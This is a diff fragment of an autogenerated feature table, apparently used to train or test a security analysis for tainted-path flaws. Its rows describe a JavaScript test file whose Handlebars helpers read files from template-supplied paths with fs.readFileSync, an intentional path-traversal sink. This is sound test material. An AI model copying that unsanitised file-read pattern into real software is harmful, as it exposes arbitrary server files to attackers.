contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | exceptional return of function prependToLines | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | exceptional return of function prependToLines | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | exceptional return of function prependToLines | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:13:41:19:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | hb.registerHelper | | autogenerated/TaintedPath/handlebars.js:13:41:19:5 | functio ... ;\\n } | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:13:41:19:5 | functio ... ;\\n } | calleeImports | handlebars | @@ -7055,6 +67487,109 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:13:41:19:5 | functio ... ;\\n } | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:13:41:19:5 | functio ... ;\\n } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:13:41:19:5 | functio ... ;\\n } | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | return of function prependToLines | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | return of function prependToLines | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | return of function prependToLines | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | return of function prependToLines | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:41:19:5 | return of function prependToLines | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:50:13:63 | prependToLines | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:50:13:63 | prependToLines | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:50:13:63 | prependToLines | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:50:13:63 | prependToLines | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:50:13:63 | prependToLines | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:65:13:70 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:13:73:13:80 | filePath | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:14:17 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:14:17 | fs | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:14:17 | fs | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:14:17 | fs | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:14:17 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:15:23 | fs\\n ... ileSync | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:15:23 | fs\\n ... ileSync | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:15:23 | fs\\n ... ileSync | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:15:23 | fs\\n ... ileSync | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:15:23 | fs\\n ... ileSync | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | exceptional return of fs\\n ... lePath) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | exceptional return of fs\\n ... lePath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | exceptional return of fs\\n ... lePath) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | exceptional return of fs\\n ... lePath) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | exceptional return of fs\\n ... lePath) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | fs\\n ... lePath) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | fs\\n ... lePath) | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | fs\\n ... lePath) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | fs\\n ... lePath) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:15:33 | fs\\n ... lePath) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:16:16 | fs\\n ... .split | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:16:16 | fs\\n ... .split | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:16:16 | fs\\n ... .split | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:16:16 | fs\\n ... .split | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:16:16 | fs\\n ... .split | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | exceptional return of fs\\n ... t("\\n") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | exceptional return of fs\\n ... t("\\n") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | exceptional return of fs\\n ... t("\\n") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | exceptional return of fs\\n ... t("\\n") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | exceptional return of fs\\n ... t("\\n") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | fs\\n ... t("\\n") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | fs\\n ... t("\\n") | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | fs\\n ... t("\\n") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | fs\\n ... t("\\n") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:16:22 | fs\\n ... t("\\n") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:17:14 | fs\\n ... .map | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:17:14 | fs\\n ... .map | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:17:14 | fs\\n ... .map | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:17:14 | fs\\n ... .map | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:17:14 | fs\\n ... .map | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | exceptional return of fs\\n ... + line) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | exceptional return of fs\\n ... + line) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | exceptional return of fs\\n ... + line) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | exceptional return of fs\\n ... + line) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | exceptional return of fs\\n ... + line) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | fs\\n ... + line) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | fs\\n ... + line) | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | fs\\n ... + line) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | fs\\n ... + line) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:17:39 | fs\\n ... + line) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:18:15 | fs\\n ... .join | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:18:15 | fs\\n ... .join | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:18:15 | fs\\n ... .join | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:18:15 | fs\\n ... .join | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:18:15 | fs\\n ... .join | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | exceptional return of fs\\n ... n("\\n") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | exceptional return of fs\\n ... n("\\n") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | exceptional return of fs\\n ... n("\\n") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | exceptional return of fs\\n ... n("\\n") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | exceptional return of fs\\n ... n("\\n") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | fs\\n ... n("\\n") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | fs\\n ... n("\\n") | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | fs\\n ... n("\\n") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | fs\\n ... n("\\n") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:14:16:18:21 | fs\\n ... n("\\n") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:15:12:15:23 | readFileSync | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:15:12:15:23 | readFileSync | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:15:12:15:23 | readFileSync | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:15:12:15:23 | readFileSync | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:15:12:15:23 | readFileSync | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:15:25:15:32 | filePath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/handlebars.js:15:25:15:32 | filePath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:15:25:15:32 | filePath | calleeImports | fs | @@ -7064,6 +67599,11 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:15:25:15:32 | filePath | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:15:25:15:32 | filePath | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:15:25:15:32 | filePath | receiverName | fs | +| autogenerated/TaintedPath/handlebars.js:16:12:16:16 | split | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:16:12:16:16 | split | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:16:12:16:16 | split | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:16:12:16:16 | split | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:16:12:16:16 | split | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:16:18:16:21 | "\\n" | CalleeFlexibleAccessPath | fs.readFileSync().split | | autogenerated/TaintedPath/handlebars.js:16:18:16:21 | "\\n" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:16:18:16:21 | "\\n" | calleeImports | fs | @@ -7072,6 +67612,21 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:16:18:16:21 | "\\n" | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | | autogenerated/TaintedPath/handlebars.js:16:18:16:21 | "\\n" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:16:18:16:21 | "\\n" | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:12:17:14 | map | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:12:17:14 | map | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:12:17:14 | map | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:12:17:14 | map | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:12:17:14 | map | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:16:17:15 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:16:17:15 | prefix | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:17:16:17:15 | prefix | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:16:17:15 | prefix | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:16:17:15 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | 'arguments' object of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | 'arguments' object of anonymous function | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | 'arguments' object of anonymous function | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | 'arguments' object of anonymous function | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:17:16:17:38 | (line) ... + line | CalleeFlexibleAccessPath | fs.readFileSync().split().map | | autogenerated/TaintedPath/handlebars.js:17:16:17:38 | (line) ... + line | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:17:16:17:38 | (line) ... + line | calleeImports | fs | @@ -7080,6 +67635,48 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:17:16:17:38 | (line) ... + line | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | | autogenerated/TaintedPath/handlebars.js:17:16:17:38 | (line) ... + line | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:17:16:17:38 | (line) ... + line | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | exceptional return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | exceptional return of anonymous function | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | exceptional return of anonymous function | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | exceptional return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | return of anonymous function | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:16:17:38 | return of anonymous function | enclosingFunctionName | init | +| 